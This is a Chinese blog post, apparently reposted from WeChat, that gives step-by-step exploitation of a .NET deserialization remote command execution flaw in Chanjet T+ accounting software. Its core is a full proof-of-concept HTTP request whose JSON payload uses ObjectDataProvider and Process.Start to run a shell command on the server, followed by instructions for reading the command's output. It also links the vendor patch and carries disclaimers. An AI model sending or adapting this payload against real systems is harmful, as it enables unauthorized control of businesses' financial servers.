hello,大家好,我是丁永博,继去年的文件上传漏洞,今年我们再更新一下畅捷通的远程命令执行漏洞。(影响范围:T+ 13.0 、16.0)
“T+”是一款灵动、智慧、时尚的互联网◎管理软件,主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。
GetStoreWarehouseByStore 存在 .net反序列化漏洞,导致远程命令执行,控制服务器。通过X-Ajaxpro-Method(用于指定在Ajax请求中要调用的服务器端方法的名称)调用GetStoreWarehouseByStore 。
poc:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host:
X-Ajaxpro-Method: GetStoreWarehouseByStore
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=b30jr3u304kv0ueugn21vjke; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1697072948; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1697072948
Upgrade-Insecure-Requests: 1
Content-Length: 591
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd", "Arguments":"/c whoami > test.txt"
}
}
}
}
访问/tplus/test.txt文件,查看命令执行结果
批量检测工具:放在知识星球
目前官方已发布补丁更新,建议受影响用户尽快安装 16.000.000.0283 及以上补丁包:
https://www.chanjetvip.com/product/goods/detail?id=6077e91b70fa071069139f62
小知识
声明
本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。
好文推荐
原文始发于微信公众号(丁永博的成长日记):实战|手把手教如何利用畅捷通t+命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论